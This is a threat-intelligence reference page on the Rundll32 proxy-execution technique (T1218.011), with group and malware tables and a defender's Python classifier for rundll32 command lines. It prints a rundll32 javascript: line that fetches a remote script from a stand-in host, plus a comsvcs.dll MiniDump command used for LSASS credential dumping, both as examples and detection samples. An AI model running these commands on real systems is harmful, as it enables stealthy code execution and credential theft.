Stealth

T1218.011: Rundll32

T1218.011 · Sub-technique · 1 platform · 26 groups

Description

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, ClickOnce can be proxied through Rundll32.exe.

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct"). This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)

Threat actors may also abuse legitimate, signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).

Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
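As an added defender-side example (not code from the ATT&CK entry), the following Python models the export-name probing order described above (W, then A, then the bare name) and tags rundll32 command lines with the abuse patterns this page lists: the javascript:/mshtml script host, ordinal exports, comsvcs.dll MiniDump, and a DLL loaded from outside the system directories. The sample command lines and the tagging heuristics are constructed for illustration; the `<PID>` and `<OUTPUT_PATH>` tokens are placeholders.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Added defender-side example (not ATT&CK's code); heuristics and samples are constructed.

def resolve_export(exports: Iterable[str], requested: str) -> Optional[str]:
    """Model rundll32's lookup order: <name>W, then <name>A, then <name>."""
    table = set(exports)
    for candidate in (requested + "W", requested + "A", requested):
        if candidate in table:
            return candidate
    return None

# Strip the leading rundll32(.exe) token, quoted or bare, with or without a path.
_EXE = re.compile(r'^\s*(?:"[^"]*rundll32(?:\.exe)?"|\S*rundll32(?:\.exe)?)\s*', re.I)
_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def parse_rundll32(cmdline: str) -> Tuple[str, str]:
    """Split 'rundll32.exe <dll>,<entry> [args]' into (dll, entry_and_args)."""
    rest = _EXE.sub("", cmdline, count=1)
    dll, _, entry = rest.partition(",")
    return dll.strip().strip('"'), entry.strip()

def classify_rundll32(cmdline: str) -> List[str]:
    """Tag a command line with the abuse patterns the technique description lists."""
    dll, entry = parse_rundll32(cmdline)
    low = dll.lower()
    tags = []
    if low.startswith("javascript:") or "mshtml" in low:
        tags.append("script-host")            # javascript:"\..\mshtml,RunHTMLApplication
    if re.match(r"#\d+", entry):
        tags.append("ordinal-export")         # file.dll,#1
    if low.endswith("comsvcs.dll") and re.match(r"minidump\b", entry, re.I):
        tags.append("minidump-lsass")         # MiniDump export of comsvcs.dll (LSASS dumping)
    if re.match(r"[a-z]:\\", low) and not low.startswith(_SYSTEM_DIRS):
        tags.append("dll-outside-system-dirs")
    return tags

SAMPLE_CMDLINES = [  # constructed lines, not real telemetry
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl",
    r"rundll32.exe C:\Users\Public\update.dll,#1",
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://example.invalid/x.sct")',
    r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll, MiniDump <PID> <OUTPUT_PATH> full',
]

def scan_samples() -> List[Tuple[str, List[str]]]:
    """Return (command line, tags) for each constructed sample; [] means no pattern matched."""
    return [(line, classify_rundll32(line)) for line in SAMPLE_CMDLINES]
```

The first sample (a Control Panel item launched through shell32.dll from System32) yields no tags, which is the normal-operations baseline the description says allowlists tend to trust.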

Platforms

Windows

Mitigations (1)

M1050 Exploit Protection

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.

Threat Groups (26)

| ID | Group | Context |
| --- | --- | --- |
| G0047 | Gamaredon Group | [Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used rundll32 to launch additional malicious components.(Citation: ESET Gamaredon... |
| G0046 | FIN7 | [FIN7](https://attack.mitre.org/groups/G0046) has used `rundll32.exe` to execute malware on a compromised network.(Citation: Mandiant FIN7 Apr 2022) |
| G0073 | APT19 | [APT19](https://attack.mitre.org/groups/G0073) configured its payload to inject into the rundll32.exe.(Citation: FireEye APT19) |
| G0094 | Kimsuky | [Kimsuky](https://attack.mitre.org/groups/G0094) has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.(Citation: Tal... |
| G1048 | UNC3886 | [UNC3886](https://attack.mitre.org/groups/G1048) has used rundll32.exe to execute MiniDump for dumping LSASS process memory.(Citation: Google Cloud T... |
| G0008 | Carbanak | [Carbanak](https://attack.mitre.org/groups/G0008) installs VNC server software that executes through rundll32.(Citation: Kaspersky Carbanak) |
| G0022 | APT3 | [APT3](https://attack.mitre.org/groups/G0022) has a tool that can run DLLs.(Citation: FireEye Clandestine Fox) |
| G0059 | Magic Hound | [Magic Hound](https://attack.mitre.org/groups/G0059) has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.(Citation: D... |
| G0127 | TA551 | [TA551](https://attack.mitre.org/groups/G0127) has used rundll32.exe to load malicious DLLs.(Citation: Unit 42 TA551 Jan 2021) |
| G0108 | Blue Mockingbird | [Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs using rundll32.exe.(Citation: RedCanary Mockin... |
| G0102 | Wizard Spider | [Wizard Spider](https://attack.mitre.org/groups/G0102) has utilized `rundll32.exe` to deploy ransomware commands with the use of WebDAV.(Citation: Man... |
| G0050 | APT32 | [APT32](https://attack.mitre.org/groups/G0050) malware has used rundll32.exe to execute an initial infection process.(Citation: Cybereason Cobalt Kitt... |
| G0032 | Lazarus Group | [Lazarus Group](https://attack.mitre.org/groups/G0032) has used rundll32 to execute malicious payloads on a compromised host.(Citation: ESET Twitter I... |
| G0092 | TA505 | [TA505](https://attack.mitre.org/groups/G0092) has leveraged `rundll32.exe` to execute malicious DLLs.(Citation: Cybereason TA505 April 201... |
| G0052 | CopyKittens | [CopyKittens](https://attack.mitre.org/groups/G0052) uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, C... |
| G0096 | APT41 | [APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020) |
| G0034 | Sandworm Team | [Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using rundll32.exe.(Citation: ESET Telebots ... |
| G0007 | APT28 | [APT28](https://attack.mitre.org/groups/G0007) executed [CHOPSTICK](https://attack.mitre.org/software/S0023) by using rundll32 commands such as ... |
| G0125 | HAFNIUM | [HAFNIUM](https://attack.mitre.org/groups/G0125) has used `rundll32` to load malicious DLLs.(Citation: Volexity Exchange Marauder March 202... |
| G0082 | APT38 | [APT38](https://attack.mitre.org/groups/G0082) has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code vi... |

Associated Software (69)

| ID | Name | Type | Context |
| --- | --- | --- | --- |
| S0260 | InvisiMole | Malware | [InvisiMole](https://attack.mitre.org/software/S0260) has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020) |
| S1160 | Latrodectus | Malware | [Latrodectus](https://attack.mitre.org/software/S1160) can use rundll32.exe to execute downloaded DLLs.(Citation: Elastic Latrodectus May 2024)(Citati... |
| S0196 | PUNCHBUGGY | Malware | [PUNCHBUGGY](https://attack.mitre.org/software/S0196) can load a DLL using Rundll32.(Citation: FireEye Know Your Enemy FIN8 Aug 2016) |
| S0635 | BoomBox | Malware | [BoomBox](https://attack.mitre.org/software/S0635) can use RunDLL32 for execution.(Citation: MSTIC Nobelium Toolset May 2021) |
| S0045 | ADVSTORESHELL | Malware | [ADVSTORESHELL](https://attack.mitre.org/software/S0045) has used rundll32.exe in a Registry value to establish persistence.(Citation: Bitdefender APT... |
| S0204 | Briba | Malware | [Briba](https://attack.mitre.org/software/S0204) uses rundll32 within [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/0... |
| S0576 | MegaCortex | Malware | [MegaCortex](https://attack.mitre.org/software/S0576) has used `rundll32.exe` to load a DLL for file encryption.(Citation: IBM MegaCortex) |
| S1064 | SVCReady | Malware | [SVCReady](https://attack.mitre.org/software/S1064) has used `rundll32.exe` for execution.(Citation: HP SVCReady Jun 2022) |
| S0342 | GreyEnergy | Malware | [GreyEnergy](https://attack.mitre.org/software/S0342) uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYST... |
| S0142 | StreamEx | Malware | [StreamEx](https://attack.mitre.org/software/S0142) uses rundll32 to call an exported function.(Citation: Cylance Shell Crew Feb 2017) |
| S0082 | Emissary | Malware | Variants of [Emissary](https://attack.mitre.org/software/S0082) have used rundll32.exe in Registry values added to establish persistence.(Citation: Em... |
| S0139 | PowerDuke | Malware | [PowerDuke](https://attack.mitre.org/software/S0139) uses rundll32.exe to load.(Citation: Volexity PowerDuke November 2016) |
| S1190 | Kapeka | Malware | [Kapeka](https://attack.mitre.org/software/S1190) is a Windows DLL file executed via ordinal by `rundll32.exe`.(Citation: Microsoft KnuckleTouch 2024)... |
| S0256 | Mosquito | Malware | [Mosquito](https://attack.mitre.org/software/S0256)'s launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.(Citati... |
| S0113 | Prikormka | Malware | [Prikormka](https://attack.mitre.org/software/S0113) uses rundll32.exe to load its DLL.(Citation: ESET Operation Groundbait) |
| S0554 | Egregor | Malware | [Egregor](https://attack.mitre.org/software/S0554) has used rundll32 during execution.(Citation: Cybereason Egregor Nov 2020) |
| S0518 | PolyglotDuke | Malware | [PolyglotDuke](https://attack.mitre.org/software/S0518) can be executed using rundll32.exe.(Citation: ESET Dukes October 2019) |
| S0081 | Elise | Malware | After copying itself to a DLL file, a variant of [Elise](https://attack.mitre.org/software/S0081) calls the DLL file using rundll32.exe.(Citation: Lot... |
| S0438 | Attor | Malware | [Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019) |
| S1044 | FunnyDream | Malware | [FunnyDream](https://attack.mitre.org/software/S1044) can use `rundll32` for execution of its components.(Citation: Bitdefender FunnyDream Campaign No... |

Frequently Asked Questions

What is T1218.011 (Rundll32)?

T1218.011 is a MITRE ATT&CK technique named 'Rundll32'. It belongs to the Stealth tactic(s). Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid trigg...

How can T1218.011 be detected?

Detection of T1218.011 (Rundll32) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.

What mitigations exist for T1218.011?

There is 1 documented mitigation for T1218.011: Exploit Protection.

Which threat groups use T1218.011?

Known threat groups using T1218.011 include: Gamaredon Group, FIN7, APT19, Kimsuky, UNC3886, Carbanak, APT3, Magic Hound.